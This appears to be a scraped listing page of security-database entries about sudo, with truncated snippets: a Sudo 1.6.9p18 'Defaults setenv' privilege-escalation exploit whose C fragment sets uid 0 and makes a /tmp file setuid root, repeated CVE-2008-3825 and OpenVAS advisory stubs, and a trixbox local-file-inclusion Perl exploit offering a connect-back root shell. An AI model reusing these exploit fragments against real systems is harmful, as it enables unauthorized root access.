Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation

Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation !/bin/sh Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0; execl"/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL;...

smb-server-stats NSE Script

Attempts to grab the server's statistics over SMB and MSRPC, which uses TCP ports 445 or 139. An administrator account is required to pull these statistics on most versions of Windows, and Vista and above require UAC to be turned down. Some of the numbers returned here don't feel right to me, but...

Design/Logic Flaw

pamkrb5 2.2.14 in Red Hat Enterprise Linux RHEL 5 and earlier, when the existingticket option is enabled, uses incorrect privileges when reading a Kerberos credential cache, which allows local users to gain privileges by setting the KRB5CCNAME environment variable to an arbitrary cache filename a...

CVE-2008-3825

pamkrb5 2.2.14 in Red Hat Enterprise Linux RHEL 5 and earlier, when the existingticket option is enabled, uses incorrect privileges when reading a Kerberos credential cache, which allows local users to gain privileges by setting the KRB5CCNAME environment variable to an arbitrary cache filename a...

CVE-2008-3825

pamkrb5 2.2.14 in Red Hat Enterprise Linux RHEL 5 and earlier, when the existingticket option is enabled, uses incorrect privileges when reading a Kerberos credential cache, which allows local users to gain privileges by setting the KRB5CCNAME environment variable to an arbitrary cache filename a...

Gentoo Security Advisory GLSA 200506-22 (sudo)

The remote host is missing updates announced in advisory GLSA 200506-22. OpenVAS Vulnerability Test $ Description: Auto generated from Gentoo's XML based advisory Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc. http://www.securityspace.com Text descriptions are largely excerpted fr...

Gentoo Security Advisory GLSA 200506-22 (sudo)

The remote host is missing updates announced in advisory GLSA 200506-22. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. VID bdd1537b-354c-11d9-a9e7-0001020eed82 OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. VID 1b725079-9ef6-11da-b410-000e0c2e438a OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. VID 3bf157fa-e1c6-11d9-b875-0001020eed82 OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. VID 045944a0-6bca-11d9-aaa6-000a95bc6fae OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. VID a268ef4a-0b35-11d9-8a8a-000c41e2cdad OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

trixbox (langChoice) Local File Inclusion Exploit (connect-back) v2

No description provided by source. !/usr/bin/perl -w Jean-Michel BESNARD [email protected] / LEXSI Audit 2008-07-09 This is an update of the previous exploit. We can now get a root shell, thanks to sudo. perl trixboxfiv2.pl 192.168.1.212 Please listen carefully as our menu option has changed...

Fonality trixbox - langChoice Local File Inclusion (connect-back) (2)

Fonality trixbox - langChoice Local File Inclusion connect-back 2 !/usr/bin/perl -w Jean-Michel BESNARD / LEXSI Audit 2008-07-09 This is an update of the previous exploit. We can now get a root shell, thanks to sudo. perl trixboxfiv2.pl 192.168.1.212 Please listen carefully as our menu option has...

Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)

!/usr/bin/perl -w Jean-Michel BESNARD / LEXSI Audit 2008-07-09 This is an update of the previous exploit. We can now get a root shell, thanks to sudo. perl trixboxfiv2.pl 192.168.1.212 Please listen carefully as our menu option has changed Choose from the following options: 1 Remote TCP shell 2...